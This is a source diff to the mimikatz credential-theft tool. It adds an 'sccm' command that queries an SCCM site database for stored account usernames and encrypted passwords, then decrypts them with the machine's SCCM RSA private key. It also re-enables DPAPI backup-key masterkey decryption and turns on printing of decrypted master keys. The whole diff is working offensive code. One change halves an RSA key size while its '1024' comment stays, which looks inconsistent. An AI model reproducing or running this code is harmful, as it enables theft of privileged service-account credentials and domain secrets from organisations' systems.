diff --git a/inc/globals.h b/inc/globals.h index 6c5556b..ea87778 100644 --- a/inc/globals.h +++ b/inc/globals.h @@ -117,6 +117,7 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU #define KULL_M_WIN_BUILD_10_1903 18362 #define KULL_M_WIN_BUILD_10_1909 18363 #define KULL_M_WIN_BUILD_10_2004 19041 +#define KULL_M_WIN_BUILD_10_20H2 19042 #define KULL_M_WIN_MIN_BUILD_XP 2500 diff --git a/mimikatz/modules/dpapi/kuhl_m_dpapi.c b/mimikatz/modules/dpapi/kuhl_m_dpapi.c index b115510..ff8e16f 100644 --- a/mimikatz/modules/dpapi/kuhl_m_dpapi.c +++ b/mimikatz/modules/dpapi/kuhl_m_dpapi.c @@ -290,20 +290,20 @@ NTSTATUS kuhl_m_dpapi_masterkey(int argc, wchar_t * argv[]) } } - //if(masterkeys->BackupKey && masterkeys->dwBackupKeyLen && convertedSid && (!(masterkeys->dwFlags & 1) || (pSystem && cbSystem))) - //{ - // kprintf(L"\n[backupkey] %s DPAPI_SYSTEM: ", pSystem ? L"with" : L"without"); - // if(pSystem) - // { - // kull_m_string_wprintf_hex(pSystem, cbSystem, 0); - // if(!(masterkeys->dwFlags & 1)) - // kprintf(L" (but is not needed)"); - // } - // kprintf(L"\n"); - // if(kull_m_dpapi_unprotect_backupkey_with_secret(masterkeys->dwFlags, masterkeys->BackupKey, convertedSid, pSystem, cbSystem, &output, &cbOutput)) - // kuhl_m_dpapi_display_MasterkeyInfosAndFree(NULL, output, cbOutput, NULL); - // else PRINT_ERROR(L"kull_m_dpapi_unprotect_backupkey_with_secret\n"); - //} + if(masterkeys->BackupKey && masterkeys->dwBackupKeyLen && convertedSid && (!(masterkeys->dwFlags & 1) || (pSystem && cbSystem))) + { + kprintf(L"\n[backupkey] %s DPAPI_SYSTEM: ", pSystem ? L"with" : L"without"); + if(pSystem) + { + kull_m_string_wprintf_hex(pSystem, cbSystem, 0); + if(!(masterkeys->dwFlags & 1)) + kprintf(L" (but is not needed)"); + } + kprintf(L"\n"); + if(kull_m_dpapi_unprotect_backupkey_with_secret(masterkeys->dwFlags, masterkeys->BackupKey, convertedSid, pSystem, cbSystem, &output, &cbOutput)) + kuhl_m_dpapi_display_MasterkeyInfosAndFree(NULL, output, cbOutput, NULL); + else PRINT_ERROR(L"kull_m_dpapi_unprotect_backupkey_with_secret\n"); + } if(masterkeys->DomainKey && masterkeys->dwDomainKeyLen) { diff --git a/mimikatz/modules/kuhl_m_misc.c b/mimikatz/modules/kuhl_m_misc.c index 73f0965..5071a4b 100644 --- a/mimikatz/modules/kuhl_m_misc.c +++ b/mimikatz/modules/kuhl_m_misc.c @@ -28,6 +28,7 @@ const KUHL_M_C kuhl_m_c_misc[] = { {kuhl_m_misc_aadcookie, L"aadcookie", NULL}, {kuhl_m_misc_aadcookie_NgcSignWithSymmetricPopKey, L"ngcsign", NULL}, {kuhl_m_misc_spooler, L"spooler", NULL}, + {kuhl_m_misc_sccm_accounts, L"sccm", NULL}, }; const KUHL_M kuhl_m_misc = { L"misc", L"Miscellaneous module", NULL, @@ -1398,4 +1399,139 @@ NTSTATUS kuhl_m_misc_spooler(int argc, wchar_t * argv[]) else PRINT_ERROR(L"missing /server argument to specify spooler server"); return STATUS_SUCCESS; -} \ No newline at end of file +} + +typedef struct _SCCM_ENCRYPTED_HEADER { + DWORD cbKey; + DWORD cbDecrypted; + BYTE data[ANYSIZE_ARRAY]; +} SCCM_ENCRYPTED_HEADER, *PSCCM_ENCRYPTED_HEADER; + +const wchar_t SCCM_QUERY[] = L"SELECT SiteNumber, UserName, Password, Availability FROM SC_UserAccount"; +NTSTATUS kuhl_m_misc_sccm_accounts(int argc, wchar_t * argv[]) +{ + LPCWCHAR szConnectionString, szPrivateKeyContainer; + + SQLHANDLE hEnv, hCon, hSmt; + SQLRETURN ret; + unsigned long int SiteNumber; + char UserName[60], Password[2048]; + BYTE Availability; + SQLLEN szUserName, szPassword; + + PSCCM_ENCRYPTED_HEADER pEncrypted; + HCRYPTPROV hProv; + HCRYPTKEY hKey; + ALG_ID algid; + DWORD cbEncrypted, dwKeySetFlags, cbBuffer; + + kull_m_string_args_byName(argc, argv, L"keycontainer", &szPrivateKeyContainer, L"Microsoft Systems Management Server"); + dwKeySetFlags = kull_m_string_args_byName(argc, argv, L"keyuser", NULL, NULL) ? 0 : CRYPT_MACHINE_KEYSET; + + kprintf(L"[CRYPTO] Private Key Container: %s (%s)\n", szPrivateKeyContainer, (dwKeySetFlags == CRYPT_MACHINE_KEYSET) ? L"machine" : L"user"); + + if(kull_m_string_args_byName(argc, argv, L"connectionstring", &szConnectionString, NULL)) + { + kprintf(L"[ SQL ] ConnectionString: %s\n", szConnectionString); + + SQLAllocHandle(SQL_HANDLE_ENV, SQL_NULL_HANDLE, &hEnv); + SQLSetEnvAttr(hEnv, SQL_ATTR_ODBC_VERSION, (SQLPOINTER)SQL_OV_ODBC3, 0); + SQLAllocHandle(SQL_HANDLE_DBC, hEnv, &hCon); + + ret = SQLDriverConnect(hCon, NULL, (SQLWCHAR*) szConnectionString, SQL_NTS, NULL, 0, NULL, SQL_DRIVER_NOPROMPT); + switch (ret) + { + case SQL_SUCCESS: + case SQL_SUCCESS_WITH_INFO: + SQLAllocHandle(SQL_HANDLE_STMT, hCon, &hSmt); + + kprintf(L"[ SQL ] Query to accounts: %s\n", SCCM_QUERY); + ret = SQLExecDirect(hSmt, (SQLWCHAR *) SCCM_QUERY, SQL_NTS); + if (ret == SQL_SUCCESS) + { + /* To avoid a lots of them */ + kprintf(L"[CRYPTO] Acquiring local SCCM RSA Private Key\n"); + if (CryptAcquireContext(&hProv, szPrivateKeyContainer, NULL, PROV_RSA_AES, dwKeySetFlags | CRYPT_SILENT)) + { + /**/ + kprintf(L"\n"); + while (SQLFetch(hSmt) == SQL_SUCCESS) + { + ret = SQLGetData(hSmt, 1, SQL_C_ULONG, &SiteNumber, sizeof(SiteNumber), NULL); + if (ret == SQL_SUCCESS) + { + ret = SQLGetData(hSmt, 2, SQL_C_CHAR, UserName, sizeof(UserName), &szUserName); + if (ret == SQL_SUCCESS) + { + ret = SQLGetData(hSmt, 3, SQL_C_CHAR, Password, sizeof(Password), &szPassword); + if (ret == SQL_SUCCESS) + { + ret = SQLGetData(hSmt, 4, SQL_C_TINYINT, &Availability, sizeof(Availability), NULL); + if (ret == SQL_SUCCESS) + { + kprintf(L"[%u-%hhu] %.*S - ", SiteNumber, Availability, szUserName, UserName); + if (kull_m_crypto_StringToBinaryA(Password, (DWORD)szPassword, CRYPT_STRING_HEX, (PBYTE*)&pEncrypted, &cbEncrypted)) + { + if (!Availability) + { + if (CryptImportKey(hProv, pEncrypted->data, pEncrypted->cbKey, 0, 0, &hKey)) + { + cbBuffer = sizeof(ALG_ID); + if (CryptGetKeyParam(hKey, KP_ALGID, (BYTE*)&algid, &cbBuffer, 0)) + { + kprintf(L"[%s] ", kull_m_crypto_algid_to_name(algid)); + } + + cbBuffer = cbEncrypted - FIELD_OFFSET(SCCM_ENCRYPTED_HEADER, data) - pEncrypted->cbKey; + if (CryptDecrypt(hKey, 0, TRUE, 0, pEncrypted->data + pEncrypted->cbKey, &cbBuffer)) + { + if (cbBuffer == pEncrypted->cbDecrypted) + { + kprintf(L"%.*S\n", cbBuffer, pEncrypted->data + pEncrypted->cbKey); + } + else PRINT_ERROR(L"cbBuffer != cbDecrypted"); + } + else PRINT_ERROR_AUTO(L"CryptDecrypt"); + + CryptDestroyKey(hKey); + } + else PRINT_ERROR_AUTO(L"CryptImportKey"); + } + else kprintf(L"{todo if needed} \n"); // SELECT Name, Value1, Value2 FROM SC_SiteDefinition_Property WHERE Name LIKE 'GlobalAccount:%' (AES256 decrypt) + + LocalFree(pEncrypted); + } + } + else PRINT_ERROR(L"SQLGetData(Availability): %u (0x%08x)\n", ret, ret); + } + else PRINT_ERROR(L"SQLGetData(Password): %u (0x%08x)\n", ret, ret); + } + else PRINT_ERROR(L"SQLGetData(UserName): %u (0x%08x)\n", ret, ret); + } + else PRINT_ERROR(L"SQLGetData(SiteNumber): %u (0x%08x)\n", ret, ret); + } + kprintf(L"\n"); + /**/ + kprintf(L"[CRYPTO] Releasing local SCCM RSA Private Key\n"); + CryptReleaseContext(hProv, 0); + } + else PRINT_ERROR_AUTO(L"CryptAcquireContext"); + /* No more crypto */ + } + else PRINT_ERROR(L"SQLExecDirect: %u (0x%08x)\n", ret, ret); + SQLFreeHandle(SQL_HANDLE_STMT, hSmt); + + break; + + default: + PRINT_ERROR(L"SQLDriverConnect: %u (0x%08x)\n", ret, ret); + } + + SQLDisconnect(hCon); + SQLFreeHandle(SQL_HANDLE_DBC, hCon); + SQLFreeHandle(SQL_HANDLE_ENV, hEnv); + } + else PRINT_ERROR(L"/connectionstring is needed, example: /connectionstring:\"DRIVER={SQL Server};Trusted=true;DATABASE=CM_PRD;SERVER=myserver.fqdn\\instancename;\"\n"); + + return STATUS_SUCCESS; +} diff --git a/mimikatz/modules/kuhl_m_misc.h b/mimikatz/modules/kuhl_m_misc.h index bb879a9..b7635de 100644 --- a/mimikatz/modules/kuhl_m_misc.h +++ b/mimikatz/modules/kuhl_m_misc.h @@ -15,6 +15,12 @@ #include "../../modules/kull_m_crypto_ngc.h" #include "../../modules/rpc/kull_m_rpc_ms-rprn.h" #include +#include +#pragma warning(push) +#pragma warning(disable:4201) +#include +#pragma warning(pop) +#include const KUHL_M kuhl_m_misc; @@ -38,6 +44,7 @@ NTSTATUS kuhl_m_misc_xor(int argc, wchar_t * argv[]); NTSTATUS kuhl_m_misc_aadcookie(int argc, wchar_t * argv[]); NTSTATUS kuhl_m_misc_aadcookie_NgcSignWithSymmetricPopKey(int argc, wchar_t * argv[]); NTSTATUS kuhl_m_misc_spooler(int argc, wchar_t * argv[]); +NTSTATUS kuhl_m_misc_sccm_accounts(int argc, wchar_t * argv[]); BOOL CALLBACK kuhl_m_misc_detours_callback_process(PSYSTEM_PROCESS_INFORMATION pSystemProcessInformation, PVOID pvArg); BOOL CALLBACK kuhl_m_misc_detours_callback_module(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION pModuleInformation, PVOID pvArg); diff --git a/modules/kull_m_crypto.c b/modules/kull_m_crypto.c index 4c3fec4..2df9264 100644 --- a/modules/kull_m_crypto.c +++ b/modules/kull_m_crypto.c @@ -357,7 +357,7 @@ BOOL kull_m_crypto_hkey_session(ALG_ID calgid, LPCVOID key, DWORD keyLen, DWORD if(CryptAcquireContext(hSessionProv, container, NULL, PROV_RSA_AES, CRYPT_NEWKEYSET)) { hPrivateKey = 0; - if(CryptGenKey(*hSessionProv, AT_KEYEXCHANGE, CRYPT_EXPORTABLE | RSA1024BIT_KEY, &hPrivateKey)) // 1024 + if(CryptGenKey(*hSessionProv, AT_KEYEXCHANGE, CRYPT_EXPORTABLE | (RSA1024BIT_KEY / 2), &hPrivateKey)) // 1024 { if(CryptExportKey(hPrivateKey, 0, PRIVATEKEYBLOB, 0, NULL, &dwkeyblob)) { @@ -384,7 +384,7 @@ BOOL kull_m_crypto_hkey_session(ALG_ID calgid, LPCVOID key, DWORD keyLen, DWORD if(CryptImportKey(*hSessionProv, keyblob, dwkeyblob, 0, 0, &hPrivateKey)) { - dwkeyblob = (1024 / 8) + sizeof(ALG_ID) + sizeof(BLOBHEADER); // 1024 + dwkeyblob = (1024 / 2 / 8) + sizeof(ALG_ID) + sizeof(BLOBHEADER); // 1024 if(pbSessionBlob = (LPBYTE)LocalAlloc(LPTR, dwkeyblob)) { ((BLOBHEADER *) pbSessionBlob)->bType = SIMPLEBLOB; @@ -401,6 +401,7 @@ BOOL kull_m_crypto_hkey_session(ALG_ID calgid, LPCVOID key, DWORD keyLen, DWORD for (i = 0; i < dwkeyblob - (sizeof(ALG_ID) + sizeof(BLOBHEADER) + keyLen + 3); i++) if (ptr[i] == 0) ptr[i] = 0x42; pbSessionBlob[dwkeyblob - 2] = 2; + status = CryptImportKey(*hSessionProv, pbSessionBlob, dwkeyblob, hPrivateKey, flags, hSessionKey); LocalFree(pbSessionBlob); } @@ -1300,5 +1301,34 @@ BOOL kull_m_crypto_dh_simpleDecrypt(HCRYPTKEY key, LPVOID data, DWORD dataLen, L } CryptDestroyKey(hTmp); } + return status; +} + +BOOL kull_m_crypto_StringToBinaryA(LPCSTR pszString, DWORD cchString, DWORD dwFlags, PBYTE* ppbBinary, PDWORD pcbBinary) +{ + BOOL status = FALSE; + + *ppbBinary = NULL; + *pcbBinary = 0; + + if (CryptStringToBinaryA(pszString, cchString, dwFlags, NULL, pcbBinary, NULL, NULL)) + { + *ppbBinary = (PBYTE)LocalAlloc(LPTR, *pcbBinary); + if (*ppbBinary) + { + if (CryptStringToBinaryA(pszString, cchString, dwFlags, *ppbBinary, pcbBinary, NULL, NULL)) + { + status = TRUE; + } + else + { + PRINT_ERROR_AUTO(L"CryptStringToBinaryA(data)"); + *ppbBinary = (PBYTE)LocalFree(*ppbBinary); + *pcbBinary = 0; + } + } + } + else PRINT_ERROR_AUTO(L"CryptStringToBinaryA(init)"); + return status; } \ No newline at end of file diff --git a/modules/kull_m_crypto.h b/modules/kull_m_crypto.h index ee1421b..802b2dc 100644 --- a/modules/kull_m_crypto.h +++ b/modules/kull_m_crypto.h @@ -199,6 +199,7 @@ PKIWI_DH kull_m_crypto_dh_Create(ALG_ID targetSessionKeyType); BOOL kull_m_crypto_dh_CreateSessionKey(PKIWI_DH dh, PMIMI_PUBLICKEY publicKey); BOOL kull_m_crypto_dh_simpleEncrypt(HCRYPTKEY key, LPVOID data, DWORD dataLen, LPVOID *out, DWORD *outLen); BOOL kull_m_crypto_dh_simpleDecrypt(HCRYPTKEY key, LPVOID data, DWORD dataLen, LPVOID *out, DWORD *outLen); +BOOL kull_m_crypto_StringToBinaryA(LPCSTR pszString, DWORD cchString, DWORD dwFlags, PBYTE* ppbBinary, PDWORD pcbBinary); #define IOCTL_GET_FEATURE_REQUEST SCARD_CTL_CODE(3400) #define IOCTL_CCID_ESCAPE SCARD_CTL_CODE(3500) diff --git a/modules/kull_m_dpapi.c b/modules/kull_m_dpapi.c index d958dc2..6006f25 100644 --- a/modules/kull_m_dpapi.c +++ b/modules/kull_m_dpapi.c @@ -828,41 +828,41 @@ BOOL kull_m_dpapi_protect_masterkey_with_shaDerivedkey(PKULL_M_DPAPI_MASTERKEY m return status; } -//BOOL kull_m_dpapi_unprotect_backupkey_with_secret(DWORD flags, PKULL_M_DPAPI_MASTERKEY masterkey, PCWSTR sid, LPCVOID secret, DWORD secretLen, PVOID *output, DWORD *outputLen) -//{ -// BOOL status = FALSE, isDPAPISecret = flags & 1; -// LPCBYTE ptrSecret = (LPCBYTE) secret; -// PVOID data, hash; -// ALG_ID algID = (masterkey->algHash == CALG_SHA_512) ? CALG_SHA_512 : CALG_SHA1; -// DWORD sidLen = (DWORD) (wcslen(sid) + 1) * sizeof(wchar_t), hashSize = kull_m_crypto_hash_len(algID), dataSize = sidLen; -// -// if(!isDPAPISecret || (isDPAPISecret && ptrSecret && secretLen)) -// { -// if(secretLen == 2 * SHA_DIGEST_LENGTH + sizeof(DWORD)) -// { -// ptrSecret += sizeof(DWORD); -// secretLen -= sizeof(DWORD); -// } -// if(isDPAPISecret) -// dataSize += secretLen; -// if(data = (PBYTE) LocalAlloc(LPTR, dataSize)) -// { -// RtlCopyMemory(data, sid, sidLen); -// if(isDPAPISecret) -// RtlCopyMemory((PBYTE) data + sidLen, ptrSecret, secretLen); -// -// if(hash = LocalAlloc(LPTR, hashSize)) -// { -// if(kull_m_crypto_hash(algID, data, dataSize, hash, hashSize)) -// status = kull_m_dpapi_unprotect_masterkey_with_shaDerivedkey(masterkey, hash, hashSize, output, outputLen); -// LocalFree(hash); -// } -// LocalFree(data); -// } -// } -// else PRINT_ERROR(L"This backup key need DPAPI_SYSTEM secret\n"); -// return status; -//} +BOOL kull_m_dpapi_unprotect_backupkey_with_secret(DWORD flags, PKULL_M_DPAPI_MASTERKEY masterkey, PCWSTR sid, LPCVOID secret, DWORD secretLen, PVOID *output, DWORD *outputLen) +{ + BOOL status = FALSE, isDPAPISecret = flags & 1; + LPCBYTE ptrSecret = (LPCBYTE) secret; + PVOID data, hash; + ALG_ID algID = (masterkey->algHash == CALG_SHA_512) ? CALG_SHA_512 : CALG_SHA1; + DWORD sidLen = (DWORD) (wcslen(sid) + 1) * sizeof(wchar_t), hashSize = kull_m_crypto_hash_len(algID), dataSize = sidLen; + + if(!isDPAPISecret || (isDPAPISecret && ptrSecret && secretLen)) + { + if(secretLen == 2 * SHA_DIGEST_LENGTH + sizeof(DWORD)) + { + ptrSecret += sizeof(DWORD); + secretLen -= sizeof(DWORD); + } + if(isDPAPISecret) + dataSize += secretLen; + if(data = (PBYTE) LocalAlloc(LPTR, dataSize)) + { + RtlCopyMemory(data, sid, sidLen); + if(isDPAPISecret) + RtlCopyMemory((PBYTE) data + sidLen, ptrSecret, secretLen); + + if(hash = LocalAlloc(LPTR, hashSize)) + { + if(kull_m_crypto_hash(algID, data, dataSize, hash, hashSize)) + status = kull_m_dpapi_unprotect_masterkey_with_shaDerivedkey(masterkey, hash, hashSize, output, outputLen); + LocalFree(hash); + } + LocalFree(data); + } + } + else PRINT_ERROR(L"This backup key need DPAPI_SYSTEM secret\n"); + return status; +} BOOL kull_m_dpapi_unprotect_domainkey_with_key(PKULL_M_DPAPI_MASTERKEY_DOMAINKEY domainkey, LPCVOID key, DWORD keyLen, PVOID *output, DWORD *outputLen, PSID *sid) { @@ -885,11 +885,11 @@ BOOL kull_m_dpapi_unprotect_domainkey_with_key(PKULL_M_DPAPI_MASTERKEY_DOMAINKEY RtlCopyMemory(rsa_buffer, domainkey->pbSecret, cbOutput); if(CryptDecrypt(hKey, 0, TRUE, 0, (PBYTE) rsa_buffer, &cbOutput)) { - //kprintf(L"\nRSA decrypt is a success\n"); - //kprintf(L" * MasterKey len: %u\n", rsa_buffer->cbMasterKey); - //kull_m_string_wprintf_hex(rsa_buffer->buffer, rsa_buffer->cbMasterKey, 1 | (16 << 16)); - //kprintf(L" * SuppKey len: %u\n", rsa_buffer->cbSuppKey); - //kull_m_string_wprintf_hex(rsa_buffer->buffer + rsa_buffer->cbMasterKey, rsa_buffer->cbSuppKey, 1 | (16 << 16)); + kprintf(L"\nRSA decrypt is a success\n"); + kprintf(L" * MasterKey len: %u\n", rsa_buffer->cbMasterKey); + kull_m_string_wprintf_hex(rsa_buffer->buffer, rsa_buffer->cbMasterKey, 1 | (16 << 16)); + kprintf(L" * SuppKey len: %u\n", rsa_buffer->cbSuppKey); + kull_m_string_wprintf_hex(rsa_buffer->buffer + rsa_buffer->cbMasterKey, rsa_buffer->cbSuppKey, 1 | (16 << 16)); if(kull_m_crypto_hkey(hProv, CALG_3DES, rsa_buffer->buffer + rsa_buffer->cbMasterKey, 192 / 8, 0, &hSessionKey, &hSessionProv)) { if(CryptSetKeyParam(hSessionKey, KP_IV, rsa_buffer->buffer + rsa_buffer->cbMasterKey + 192 / 8, 0)) @@ -903,14 +903,14 @@ BOOL kull_m_dpapi_unprotect_domainkey_with_key(PKULL_M_DPAPI_MASTERKEY_DOMAINKEY if(CryptDecrypt(hSessionKey, 0, FALSE, 0, (PBYTE) des_buffer, &cbOutput)) { pSid = (PSID) (des_buffer->data + des_buffer->dataLen); - //kprintf(L"\n3DES decrypt is a success too\n"); - ////kull_m_string_wprintf_hex(des_buffer, outSize, 1 | (16 << 16)); kprintf(L"\n"); - //kprintf(L" * nonce : "); kull_m_string_wprintf_hex(des_buffer->data, des_buffer->dataLen, 0); kprintf(L"\n"); // try to leave it as is =) - //kprintf(L" * SID : "); kull_m_string_displaySID(pSid); kprintf(L"\n"); - //kprintf(L" * SHA1 : "); kull_m_string_wprintf_hex((PBYTE) des_buffer + cbOutput - SHA_DIGEST_LENGTH, SHA_DIGEST_LENGTH, 0); kprintf(L"\n"); + kprintf(L"\n3DES decrypt is a success too\n"); + kull_m_string_wprintf_hex(des_buffer, cbOutput, 1 | (16 << 16)); kprintf(L"\n"); + kprintf(L" * nonce : "); kull_m_string_wprintf_hex(des_buffer->data, des_buffer->dataLen, 0); kprintf(L"\n"); // try to leave it as is =) + kprintf(L" * SID : "); kull_m_string_displaySID(pSid); kprintf(L"\n"); + kprintf(L" * SHA1 : "); kull_m_string_wprintf_hex((PBYTE) des_buffer + cbOutput - SHA_DIGEST_LENGTH, SHA_DIGEST_LENGTH, 0); kprintf(L"\n"); if(kull_m_crypto_hash(CALG_SHA1, des_buffer, cbOutput - SHA_DIGEST_LENGTH, digest, SHA_DIGEST_LENGTH)) { - //kprintf(L" > Calc SHA1: "); kull_m_string_wprintf_hex(digest, SHA_DIGEST_LENGTH, 0); kprintf(L"\n"); + kprintf(L" > Calc SHA1: "); kull_m_string_wprintf_hex(digest, SHA_DIGEST_LENGTH, 0); kprintf(L"\n"); if(RtlEqualMemory((PBYTE) des_buffer + cbOutput - SHA_DIGEST_LENGTH, digest, SHA_DIGEST_LENGTH)) { *outputLen = rsa_buffer->cbMasterKey; diff --git a/modules/kull_m_dpapi.h b/modules/kull_m_dpapi.h index 2617076..7b23d62 100644 --- a/modules/kull_m_dpapi.h +++ b/modules/kull_m_dpapi.h @@ -186,7 +186,7 @@ BOOL kull_m_dpapi_protect_masterkey_with_password(DWORD flags, PKULL_M_DPAPI_MAS BOOL kull_m_dpapi_protect_masterkey_with_userHash(PKULL_M_DPAPI_MASTERKEY masterkey, LPCVOID userHash, DWORD userHashLen, PCWSTR sid, BOOL isKeyOfProtectedUser, LPCVOID pbKey, DWORD dwKey, OPTIONAL LPCVOID pbInternalSalt); BOOL kull_m_dpapi_protect_masterkey_with_shaDerivedkey(PKULL_M_DPAPI_MASTERKEY masterkey, LPCVOID shaDerivedkey, DWORD shaDerivedkeyLen, LPCVOID pbKey, DWORD dwKey, OPTIONAL LPCVOID pbInternalSalt); -//BOOL kull_m_dpapi_unprotect_backupkey_with_secret(DWORD flags, PKULL_M_DPAPI_MASTERKEY masterkey, PCWSTR sid, LPCVOID secret, DWORD secretLen, PVOID *output, DWORD *outputLen); +BOOL kull_m_dpapi_unprotect_backupkey_with_secret(DWORD flags, PKULL_M_DPAPI_MASTERKEY masterkey, PCWSTR sid, LPCVOID secret, DWORD secretLen, PVOID *output, DWORD *outputLen); BOOL kull_m_dpapi_unprotect_domainkey_with_key(PKULL_M_DPAPI_MASTERKEY_DOMAINKEY domainkey, LPCVOID key, DWORD keyLen, PVOID *output, DWORD *outputLen, PSID *sid); BOOL kull_m_dpapi_unprotect_domainkey_with_rpc(PKULL_M_DPAPI_MASTERKEYS masterkeys, PVOID rawMasterkeys, LPCWSTR server, PVOID *output, DWORD *outputLen); diff --git a/modules/rpc/kull_m_rpc_ms-rprn.h b/modules/rpc/kull_m_rpc_ms-rprn.h index 16ce7ea..ee5dac9 100644 --- a/modules/rpc/kull_m_rpc_ms-rprn.h +++ b/modules/rpc/kull_m_rpc_ms-rprn.h @@ -1,9 +1,9 @@ #pragma once #include "kull_m_rpc.h" - +/* #define PRINTER_CHANGE_ADD_JOB 0x00000100 #define PRINTER_CHANGE_ALL 0x7777FFFF - +*/ #define PRINTER_NOTIFY_CATEGORY_ALL 0x00010000 typedef void *PRINTER_HANDLE;